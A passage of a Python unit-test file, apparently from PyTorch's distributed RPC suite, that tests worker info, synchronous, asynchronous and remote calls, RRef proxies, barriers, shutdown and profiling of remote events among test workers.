future.set_result(wrapper(tensor))
with torch.cuda.stream(another_stream):
tensor = unwrapper(future.wait())
if sparse_tensor:
self.assertTrue(torch.eq(tensor.indices(), expected_tensor.indices()).all().item())
self.assertTrue(torch.eq(tensor.values(), expected_tensor.values()).all().item())
self.assertEqual(tensor.size(), expected_tensor.size())
else:
self.assertTrue(torch.eq(tensor, expected_tensor).all().item())
class RpcTest(RpcAgentTestFixture, RpcTestCommon):
@dist_init
def test_worker_id(self):
n = self.rank + 1
peer_rank = n % self.world_size
self_worker_info = rpc.get_worker_info()
peer_worker_info = rpc.get_worker_info(worker_name(peer_rank))
self.assertEqual(self_worker_info.name, worker_name(self.rank))
self.assertEqual(peer_worker_info.name, worker_name(peer_rank))
with self.assertRaisesRegex(RuntimeError, "Unknown destination worker"):
unknown_worker_id = rpc.get_worker_info("WorkerUnknown")
@dist_init
def test_get_worker_infos(self):
worker_infos = rpc.api._get_current_rpc_agent().get_worker_infos()
worker_names = {worker_info.name for worker_info in worker_infos}
expected_worker_names = {
worker_name(rank) for rank in range(self.world_size)
}
self.assertEqual(worker_names, expected_worker_names)
worker_ids = {worker_info.id for worker_info in worker_infos}
expected_worker_ids = set(range(self.world_size))
self.assertEqual(worker_ids, expected_worker_ids)
@dist_init
def test_self_add(self):
self_worker_info = rpc.get_worker_info()
self_worker_name = worker_name(self.rank)
fut = rpc.rpc_async(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
ret = rpc.rpc_sync(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertEqual(ret, torch.ones(2, 2) + 1)
@dist_init
def test_send_to_rank(self):
dst_rank = (self.rank + 1) % self.world_size
# Test dense tensor
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test invalid ranks
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(self.world_size + 1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(-1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank + 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank - 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
@dist_init
def test_self_py_udf_remote(self):
self._self_py_udf_remote(
rpc.get_worker_info(),
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_rpc_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_rpc_arg(
dst,
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_self_rpc_arg(self):
self._self_remote_rref_as_rpc_arg(
rpc.get_worker_info(),
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_remote_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_remote_arg(
dst,
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_self_remote_arg(self):
self._self_remote_rref_as_remote_arg(
rpc.get_worker_info(),
torch.ones(2, 2),
1,
3
)
@dist_init
def test_rref_proxy_non_exist(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
msg = "has no attribute \'non_exist\'"
with self.assertRaisesRegex(AttributeError, msg):
rref.rpc_sync().non_exist()
with self.assertRaisesRegex(AttributeError, msg):
rref.rpc_async().non_exist().wait()
with self.assertRaisesRegex(AttributeError, msg):
rref.remote().non_exist()
def _test_rref_proxy_tensor(self, dst):
rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
expected = torch.ones(2, 2) + 1 + 3
self.assertEqual(expected.size(), rref.rpc_sync().size())
self.assertEqual(expected + 1, rref.rpc_async().add(1).wait())
self.assertEqual(expected.view(1, 4), rref.remote().view(1, 4).to_here())
@dist_init
def test_rref_proxy_tensor(self):
self._test_rref_proxy_tensor(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_tensor_self(self):
self._test_rref_proxy_tensor(rpc.get_worker_info())
@dist_init
def test_rref_proxy_reuse(self):
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
my_function,
args=(torch.ones(2, 2), 1, 3)
)
expected = torch.ones(2, 2) + 1 + 3
proxy_rpc_sync = rref.rpc_sync()
proxy_rpc_async = rref.rpc_async()
proxy_remote = rref.remote()
self.assertEqual(expected.size(), proxy_rpc_sync.size())
self.assertEqual(expected + 1, proxy_rpc_sync.add(1))
self.assertEqual(expected.view(1, 4), proxy_rpc_sync.view(1, 4))
self.assertEqual(expected.size(), proxy_rpc_async.size().wait())
self.assertEqual(expected + 3, proxy_rpc_async.add(3).wait())
self.assertEqual(expected.view(4, 1), proxy_rpc_async.view(4, 1).wait())
self.assertEqual(expected.size(), proxy_remote.size().to_here())
self.assertEqual(expected + 5, proxy_remote.add(5).to_here())
self.assertEqual(expected.view(-1), proxy_remote.view(-1).to_here())
def _test_rref_proxy_class(self, dst):
rref = rpc.remote(dst, MyClass, args=(7,))
expected = MyClass(7)
self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
expected.increment_value(3)
self.assertEqual(None, rref.rpc_sync().increment_value(1))
self.assertEqual(None, rref.rpc_async().increment_value(1).wait())
self.assertEqual(None, rref.remote().increment_value(1).to_here())
self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
self.assertEqual(
expected.my_instance_method(2),
rref.rpc_sync().my_instance_method(2)
)
self.assertEqual(
expected.my_instance_method(3),
rref.rpc_async().my_instance_method(3).wait()
)
self.assertEqual(
expected.my_instance_method(4),
rref.remote().my_instance_method(4).to_here()
)
self.assertEqual(
expected.my_static_method(9),
rref.rpc_sync().my_static_method(9)
)
self.assertEqual(
expected.my_static_method(10),
rref.rpc_async().my_static_method(10).wait()
)
self.assertEqual(
expected.my_static_method(11),
rref.remote().my_static_method(11).to_here()
)
self.assertEqual(
expected.my_class_method(2, torch.zeros(2, 2)),
rref.rpc_sync().my_class_method(2, torch.zeros(2, 2))
)
self.assertEqual(
expected.my_class_method(2, torch.ones(3, 3)),
rref.rpc_async().my_class_method(2, torch.ones(3, 3)).wait()
)
self.assertEqual(
expected.my_class_method(2, torch.ones(4, 4)),
rref.remote().my_class_method(2, torch.ones(4, 4)).to_here()
)
@dist_init
def test_rref_proxy_class(self):
self._test_rref_proxy_class(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_class_self(self):
self._test_rref_proxy_class(rpc.get_worker_info())
@mock.patch.object(torch.distributed.autograd, "_init")
@mock.patch.object(torch.distributed.rpc.api, "_set_and_start_rpc_agent")
@dist_init(setup_rpc=False)
def test_register_rpc_backend_and_set_and_start_rpc_backend(
self, mock_rpc_agent, mock_dist_autograd_init
):
backend_name = "stub_backend"
backend = rpc.backend_registry.register_backend(
backend_name,
_stub_construct_rpc_backend_options_handler,
_stub_init_rpc_backend_handler,
)
with self.assertRaisesRegex(
RuntimeError, "^RPC backend .+: already registered$"
):
backend = rpc.backend_registry.register_backend(
backend_name,
_stub_construct_rpc_backend_options_handler,
_stub_init_rpc_backend_handler,
)
rpc.init_rpc(
name="worker1",
backend=backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_duplicate_name(self):
with self.assertRaisesRegex(RuntimeError, "is not unique"):
store, _, _ = next(
torch.distributed.rendezvous(
self.init_method, rank=self.rank, world_size=self.world_size
)
)
rpc._init_rpc_backend(
backend=self.rpc_backend,
store=store,
name="duplicate_name",
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_duplicate_name_2(self):
with self.assertRaisesRegex(RuntimeError, "is not unique"):
rpc.init_rpc(
name=worker_name(self.rank % (self.world_size - 1)),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_reinit(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
# TODO: with TCP init, rank 0 raises Address already in use because
# rank 0 is the start daemon and the store is created before checking if
# RPC is already initialized in init_rpc.
if os.environ.get("RPC_INIT_WITH_TCP", None) == "1" and self.rank == 0:
expected_reinit_err = "Address already in use"
else:
expected_reinit_err = "is already initialized"
with self.assertRaisesRegex(RuntimeError, expected_reinit_err):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc.shutdown()
@dist_init(setup_rpc=False)
def test_pg_init_no_rpc_init(self):
dist.init_process_group(
backend='gloo',
init_method=self.file_init_method,
rank=self.rank,
world_size=self.world_size)
class MyModel(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(3, 4)
def forward(self, x):
return self.lin(x)
model = MyModel()
model.train()
model = torch.nn.parallel.DistributedDataParallel(model)
with self.assertRaisesRegex(RuntimeError, 'Current RPC agent is not set! Did you initialize the RPC framework'):
params = []
for param in model.parameters():
params.append(RRef(param))
def test_world_size_one(self):
self._world_size_one(
torch.ones(2, 2),
torch.ones(2, 2)
)
@dist_init(setup_rpc=False)
def test_invalid_names(self):
worker_id = 0
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo("abc*", worker_id)
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo(" ", worker_id)
with self.assertRaisesRegex(RuntimeError, "must be non-empty"):
info = WorkerInfo("", worker_id)
# If the number in the message does not match, it is likely that the
# value of MAX_NAME_LEN in RPC WorkerInfo has changed.
with self.assertRaisesRegex(RuntimeError, "shorter than 128"):
info = WorkerInfo("".join(["a" for i in range(500)]), worker_id)
# Test that WorkerInfo can be pickled and sent in RPC call
@dist_init
def test_worker_info_pickle(self):
dst_rank = (self.rank + 1) % self.world_size
worker_info = rpc.api.get_worker_info()
ret = rpc.rpc_sync(worker_name(dst_rank), identity, args=(worker_info,))
self.assertEqual(ret, worker_info)
@dist_init
def test_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@staticmethod
def return_callee_id():
return rpc.get_worker_info().id
@dist_init
def test_int_callee(self):
dst_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(dst_rank, RpcTest.return_callee_id)
self.assertEqual(ret, dst_rank)
@dist_init
def test_add_with_id(self):
n = self.rank + 1
dst_rank = n % self.world_size
workder_info = rpc.get_worker_info(worker_name(dst_rank))
ret = rpc.rpc_sync(
workder_info, torch.add, args=(torch.ones(n, n), torch.ones(n, n))
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@dist_init
def test_scalar_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), n)
)
self.assertEqual(ret, (torch.ones(n, n) + n))
@dist_init
def test_async_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_nonzero(self):
n = self.rank + 1
dst_rank = n % self.world_size
x = torch.ones(self.world_size, self.world_size)
x[self.rank][self.rank] = 0
ret = rpc.rpc_sync(worker_name(dst_rank), torch.nonzero, args=(x,))
self.assertEqual(ret, x.nonzero())
@dist_init
def test_multi_rpc(self):
self._multi_rpc(False)
@dist_init
def test_future_wait_twice(self):
dst = worker_name((self.rank + 1) % self.world_size)
futs = []
for i in range(20):
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
torch.futures.wait_all(futs)
for fut in futs:
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
def _run_uneven_workload(self, f, x, num_repeat=30):
# worker0 drives and waits for worker1 and worker2
# throughout the test.
if self.rank == 0:
self.assertTrue(self.world_size >= 3)
# Phase 1: Only worker1 has workload.
dst = "worker1"
futs = []
for _ in range(num_repeat):
fut = rpc.rpc_async(dst, f, args=(x,))
futs.append(fut)
for fut in torch.futures.collect_all(futs).wait():
self.assertEqual(fut.wait(), 0)
# Phase 2: Only worker2 has workload.
# If join is not correctly implemented,
# worker2 should be closed by now.
dst = "worker2"
futs = []
for _ in range(num_repeat):
fut = rpc.rpc_async(dst, f, args=(x,))
futs.append(fut)
for val in torch.futures.wait_all(futs):
self.assertEqual(val, 0)
@dist_init(setup_rpc=False)
def test_wait_all_workers_timeout(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
og_func = rpc.api._wait_all_workers
def wait_all_workers_sleep(timeout):
try:
rpc.api._all_gather(SlowPickleClass(0.5), timeout=timeout)
except RuntimeError as ex:
raise ex
rpc.api._wait_all_workers = wait_all_workers_sleep
try:
with self.assertRaisesRegex(RuntimeError, ''):
rpc.shutdown(graceful=True, timeout=0.01)
finally:
rpc.api._wait_all_workers = og_func
dist.barrier()
def test_wait_all_workers_dense(self):
self._wait_all_workers(heavy_rpc, torch.ones(100, 100))
def test_wait_all_workers_twice_dense(self):
self._wait_all_workers_twice(heavy_rpc, torch.ones(100, 100))
@dist_init
def test_all_gather(self):
info = rpc.get_worker_info()
results = rpc.api._all_gather(info.id)
expected = {}
for info in rpc._get_current_rpc_agent().get_worker_infos():
expected[info.name] = info.id
self.assertEqual(expected, results)
@dist_init
def test_all_gather_timeout(self):
rpc._set_rpc_timeout(0.1)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError,
"timed out in _all_gather after 0\\.10 seconds"
):
rpc.api._all_gather(SlowPickleClass(0.5))
else:
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.api._all_gather(SlowPickleClass(0.5))
def _test_barrier_helper(self, info, names, multi_threaded=False):
names = sorted(names)
leader = names[0]
rpc.rpc_sync(leader, _reset_count)
if not multi_threaded and info.name == leader:
self.assertEqual(_rpc_barrier_count, 0)
rpc.api._barrier(names)
rpc.rpc_sync(leader, _increment_count)
rpc.api._barrier(names)
if not multi_threaded and info.name == leader:
self.assertEqual(_rpc_barrier_count, len(names))
@dist_init
def test_rpc_barrier_all(self):
# Test rpc barrier when called with full list of workers
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
names = [worker.name for worker in all_worker_info]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_subset(self):
# Test rpc barrier when processes are called with different subsets of the full list
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
if info.id % 2:
names = [worker.name for worker in all_worker_info if worker.id % 2]
else:
names = [worker.name for worker in all_worker_info if not worker.id % 2]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_partial_subset(self):
# Test rpc barrier when some processes are not involved in the barrier
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
if info.id % 2:
names = [worker.name for worker in all_worker_info if worker.id % 2]
else:
names = [f"worker{info.id}"]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_multithreaded(self):
# This tests validates the implementation of barrier when multiple threads call into it
# We only need to check that it does not hang in this case
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
names = [worker.name for worker in all_worker_info]
threads = []
for _ in range(3):
th = threading.Thread(target=self._test_barrier_helper, args=(info, names, True))
threads.append(th)
th.start()
for th in threads:
th.join()
@dist_init
def test_graceful_shutdown_with_uneven_workload(self):
"""Test graceful termination."""
self._run_uneven_workload(heavy_rpc, torch.ones(100, 100))
@dist_init(setup_rpc=False)
def test_shutdown_followed_by_rpc(self):
# Initialize RPC.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
rpc.shutdown()
with self.assertRaisesRegex(RuntimeError, "^RPC has not been initialized"):
rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
@dist_init
def test_expected_src(self):
dst_rank = (self.rank + 1) % self.world_size
expected_src_rank = (self.rank - 1) % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), set_value, args=(self.rank,))
value = VALUE_FUTURE.result()
self.assertEqual(value, expected_src_rank)
@dist_init
def test_py_built_in(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), min, args=(n, n + 1, n + 2))
self.assertEqual(ret, min(n, n + 1, n + 2))
@dist_init
def test_py_user_defined(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(ret, my_function(n, n + 1, n + 2))
def test_build_rpc_profiling_key(self):
# Tests that the name that shows up as an Event in profiling RPCs has all
# the necessary information.
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
rpc_profiling_key = _build_rpc_profiling_key(
exec_mode, "foo", "worker0", "worker1"
)
self.assertIn(exec_mode.value, rpc_profiling_key)
self.assertIn("foo", rpc_profiling_key)
self.assertIn("worker0", rpc_profiling_key)
self.assertIn("worker1", rpc_profiling_key)
def check_profiling_info(self, self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode):
self.assertTrue(self_worker_name in rpc_event.name)
self.assertTrue(dst_worker_name in rpc_event.name)
if isinstance(func, torch.jit.ScriptFunction):
self.assertTrue(torch._jit_internal._qualified_name(func) in rpc_event.name)
else:
self.assertTrue(func.__name__ in rpc_event.name)
self.assertTrue(rpc_exec_mode.value in rpc_event.name)
self.assertEqual(rpc_event.count, 1)
@dist_init
def test_profiler_rpc_record_shapes(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
t1, t2 = torch.ones(100), torch.ones(100)
with _profile(record_shapes=True) as prof:
rpc.rpc_sync(dst_worker, torch.add, args=(t1, t2))
function_events = prof.function_events
remote_events = [event for event in function_events if event.is_remote]
remote_add_event = [
event for event in remote_events if "aten::add" in event.name
][0]
remote_add_input_shapes = remote_add_event.input_shapes
# Run profiler on equivalent local op and validate shapes are the same.
with _profile(record_shapes=True) as prof:
torch.add(t1, t2)
local_function_events = prof.function_events
local_add_event = [
event for event in local_function_events if "aten::add" in event.name
][0]
local_add_input_shapes = local_add_event.input_shapes
self.assertEqual(remote_add_input_shapes, local_add_input_shapes)
@dist_init
def test_profiler_rpc_memory(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
with _profile(profile_memory=True) as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
function_events = p.function_events
event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
# if cpu_memory_usage was not propagated over the wire, this set would
# only contain 0 (indicates no memory being profiled)
self.assertNotEqual({0}, event_cpu_mem_usages)
# No memory profiled if profile_memory=False
with _profile(profile_memory=False) as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
function_events = p.function_events
event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
self.assertEqual({0}, event_cpu_mem_usages)
@dist_init
def test_profiler_export_trace(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
with _profile() as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
events = p.function_events
with TemporaryFileName() as fname:
path = fname
p.export_chrome_trace(path)
with open(path) as f:
trace = json.load(f)
event_names = [event['name'] for event in trace]
for expected_event_name in EXPECTED_REMOTE_EVENTS + [RPCExecMode.ASYNC.value]:
event_exists = any([expected_event_name in event_name for event_name in event_names])
self.assertTrue(event_exists)
@dist_init
def test_profiler_rpc_key_names(self):
# tests that remote events are properly prefixed with the RPC profiling key.
if self.rank != 1:
return
# Spawn multiple threads that send RPCs to ensure keys are correctly
# prefixied when there are multiple RPCs being created/in flight at the
# same time.
dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
def rpc_with_profiling(dst_worker):
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
fut.wait()
events = prof.function_events
remote_event_names = {
event.name: event for event in events if event.is_remote
}
rpc_profiling_key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
udf_with_torch_ops.__qualname__,
worker_name(self.rank),
dst_worker,
)
remote_event_name_set = set(EXPECTED_REMOTE_EVENTS)
for name, event in remote_event_names.items():
# Ensure that we have the expected key as part of the remote
# event.
self.assertTrue(name.startswith(rpc_profiling_key))
self.assertTrue(event.is_remote)
self.assertTrue(event.node_id == rpc.get_worker_info(dst_worker).id)
# Ensure that the remote event name also contains the operator.
operator_name_substr = name[len(rpc_profiling_key) :]
# Note: we don't assert that every remote event needs to be
# in the above set, the set is just a representative set of
# what we expect to see. The profiler can change and add more
# events, but we should always expect to see this representative
# set.
matching_event = {
remote_event_name
for remote_event_name in remote_event_name_set
if remote_event_name in operator_name_substr
}
remote_event_name_set -= matching_event
# The set should be empty, otherwise its contained elements did
# not show up in the remote profiler output.
self.assertTrue(
remote_event_name_set == set(),
f"Expected {remote_event_name_set} to be included in remote profiler output.",
)
for dst in dst_ranks:
dst_worker = worker_name(dst)
num_parallel_rpcs = 2
with concurrent.futures.ThreadPoolExecutor(
max_workers=num_parallel_rpcs
) as executor:
futs = [
executor.submit(rpc_with_profiling, dst_worker)
for _ in range(num_parallel_rpcs)
]
# Wait for workers to finish test
for fut in futs:
fut.result()
def _run_test_profiler_remote_events_profiled(self):
# Tests that we can successfully invoke the profiler on a remote node,
# and collect the remote events back in the local profiler.
if self.rank != 1:
return
dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
for dst in dst_ranks:
dst_worker = worker_name(dst)
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
ret = fut.wait()
events = prof.function_events
rpc_event = get_function_event(events, RPCExecMode.ASYNC.value)
self.check_profiling_info(
worker_name(self.rank),
dst_worker,
udf_with_torch_ops,
rpc_event,
RPCExecMode.ASYNC,
)
remote_events = {event.name: event for event in events if event.is_remote}
rpc_profiling_key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
udf_with_torch_ops.__qualname__,
worker_name(self.rank),
worker_name(dst),
)
for expected_remote_event_name in EXPECTED_REMOTE_EVENTS:
expected_key = rpc_profiling_key + REMOTE_OP_STR + expected_remote_event_name
self.assertTrue(expected_key in remote_events)
remote_event = remote_events[expected_key]
# Remote event should have a node ID corresponding to the worker
# it ran on.
self.assertEqual(remote_event.node_id, dst)
# Validate order remote events show up in profiling output.
def convert_remote_to_local(event_name):
remote_op_key = rpc_profiling_key + REMOTE_OP_STR
return event_name[
event_name.find(remote_op_key)
+ len(remote_op_key) :
]
remote_events_list = [
convert_remote_to_local(event.name)
for event in events
if convert_remote_to_local(event.name) in EXPECTED_REMOTE_EVENTS
]
self.assertEqual(
set(remote_events_list),
set(EXPECTED_REMOTE_EVENTS),
f"Mismatch between profiled events: {set(remote_events_list)} and expected events: {set(EXPECTED_REMOTE_EVENTS)}",
)
@dist_init
def test_profiler_remote_events_profiled(self):
self._run_test_profiler_remote_events_profiled()
@dist_init
def test_profiler_remote_events_profiled_single_threaded(self):
self._run_test_profiler_remote_events_profiled()
def run_profiling_workload(self, dst):
fut = rpc.rpc_async(
worker_name(dst),
torch.mul,
args=(
torch.tensor(1.0, requires_grad=True),
torch.tensor(1.0, requires_grad=True),
),
)
fut.wait()
def _run_rpc_profiling_async_function(self, device="cpu"):
if self.rank != 1:
return
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
x = torch.ones(2)
y = torch.ones(2)
with _profile() as prof:
ret = rpc.rpc_async(
dst1, slow_async_add, args=(dst2, x, y, device), timeout=20
)
out = ret.wait()
function_events = prof.function_events
# slow_async_add resulted in an RPC from dst1 -> dst2, so this should be
# recorded.
key_prefix = _build_rpc_profiling_key(
RPCExecMode.ASYNC, slow_async_add.__qualname__, worker_name(self.rank), dst1
)
nested_rpc_key_prefix = _build_rpc_profiling_key(
RPCExecMode.ASYNC, slow_add.__qualname__, dst1, dst2
)
expected_key = key_prefix + REMOTE_OP_STR + nested_rpc_key_prefix
remote_events = [event for event in function_events if event.is_remote]
rpc_remote_event = [
event for event in remote_events if event.name == expected_key
]
self.assertEqual(1, len(rpc_remote_event))
rpc_remote_event = rpc_remote_event[0]
self.assertEqual(rpc_remote_event.node_id, (self.rank + 1) % self.world_size)
# slow_async_add's RPC does an add on dst2, which should be reflected as well.
remote_add_key = (
expected_key + REMOTE_OP_STR + torch.jit._builtins._find_builtin(torch.add)
)
remote_add_event = [
event for event in remote_events if event.name == remote_add_key
]
self.assertEqual(1, len(remote_add_event))
remote_add_event = remote_add_event[0]
# Validate that node_id is dst2.
self.assertEqual(remote_add_event.node_id, (self.rank + 2) % self.world_size)
@dist_init
def test_rpc_profiling_async_function(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
self._run_rpc_profiling_async_function()
if torch.cuda.is_available():
dist.barrier()
self._run_rpc_profiling_async_function(device="cuda:0")
@dist_init
def test_rpc_profiling_async_function_single_threaded(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
self._run_rpc_profiling_async_function()
if torch.cuda.is_available():
dist.barrier()
self._run_rpc_profiling_async_function(device="cuda:0")
@dist_init
def test_rpc_profiling_remote_record_function(self):
# test that functions run over RPC with record_function show the expected
# profiled block.
if self.rank != 1:
return
dst_ranks = [i for i in range(self.world_size) if i != self.rank]
for dst_rank in dst_ranks:
dst_worker = worker_name(dst_rank)
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=(-1, True))
fut.wait()
function_events = prof.function_events
record_function_remote_event = [
evt for evt in function_events if "##forward##" in evt.name
]
self.assertEqual(1, len(record_function_remote_event))
record_function_remote_event = record_function_remote_event[0]
self.assertEqual(record_function_remote_event.node_id, dst_rank)
# cpu_children only returns direct children, so here we get all
# children recursively.
def get_cpu_children(event):
if not event.cpu_children:
return []
cpu_children = event.cpu_children
for e in event.cpu_children:
cpu_children.extend(get_cpu_children(e))
return cpu_children
remote_children = get_cpu_children(record_function_remote_event)
# Get local children and verify parity.
with _profile() as prof:
udf_with_torch_ops(-1, True)
local_function_events = prof.function_events
local_record_function_event = [
evt for evt in local_function_events if "##forward##" in evt.name
][0]
local_children = get_cpu_children(local_record_function_event)
local_children_names = [
evt.name for evt in local_children
]
REMOTE_OP_STR = "#remote_op: "
def convert_remote_to_local(event_name):
remote_op_key = REMOTE_OP_STR
return event_name[
event_name.find(remote_op_key) + len(remote_op_key) :
]
for evt in remote_children:
local_name = convert_remote_to_local(evt.name)
self.assertTrue(local_name in local_children_names)
def validate_profiling_workload(self, dst, prof):
def convert_remote_to_local(event_name):
return event_name[event_name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR) :]
events = prof.function_events
remote_events = {
convert_remote_to_local(event.name): event
for event in events
if event.is_remote
}
self.assertTrue("aten::mul" in remote_events)
remote_mul_event = remote_events["aten::mul"]
self.assertEqual(remote_mul_event.node_id, dst)
self.check_profiling_info(
worker_name(self.rank),
worker_name(dst),
torch.mul,
remote_mul_event,
RPCExecMode.ASYNC,
)
def _run_test_profiler_with_autograd_context(self):
dst = (self.rank + 1) % self.world_size
if self.rank == 1:
# Cases where we can double wrap messages with profiling information and autograd info.
with dist_autograd.context() as context_id:
with _profile() as prof:
self.run_profiling_workload(dst)
self.validate_profiling_workload(dst, prof)
# Ensure that flipped order of ctx managers results in events being
# recorded as expected.
with _profile() as prof:
with dist_autograd.context() as context_id:
self.run_profiling_workload(dst)
self.validate_profiling_workload(dst, prof)
@dist_init
def test_profiler_with_autograd_context_single_threaded(self):
self._run_test_profiler_with_autograd_context()
@dist_init
def test_profiler_with_autograd_context(self):
self._run_test_profiler_with_autograd_context()
